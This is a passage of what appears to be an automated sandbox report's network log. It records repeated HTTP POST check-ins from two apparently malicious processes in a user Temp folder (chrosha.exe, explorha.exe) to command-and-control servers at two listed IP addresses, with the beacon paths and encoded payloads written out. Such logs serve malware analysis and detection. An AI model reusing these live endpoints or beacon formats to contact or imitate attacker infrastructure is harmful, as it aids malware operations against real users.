                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:51.501164913 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      199192.168.2.550040193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:51.751411915 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:51.994056940 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:51.995008945 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:52.245302916 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      200192.168.2.550041193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:51.868043900 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:52.115941048 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      201192.168.2.550042193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:52.133841991 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:52.385466099 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      202192.168.2.550043193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:52.600255966 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:52.847877979 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:52.848735094 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:53.100982904 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      203192.168.2.550044193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:52.744927883 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:52.993236065 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:52 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      204192.168.2.550045193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:53.015222073 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:53.272310972 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      205192.168.2.550046193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:53.457995892 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:53.701596975 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:53.702600956 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:53.951034069 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      206192.168.2.550047193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:53.631294966 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:53.872534037 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:53 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      207192.168.2.550048193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:54.124835014 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:54.378406048 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      208192.168.2.550049193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:54.306655884 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:54.555742979 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:54.556777954 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:54.813754082 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      209192.168.2.550050193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:54.745862007 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:54.993726969 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:54 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      210192.168.2.550051193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:55.177989006 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:55.420648098 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:55.421571970 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:30:55.671516895 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:55 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


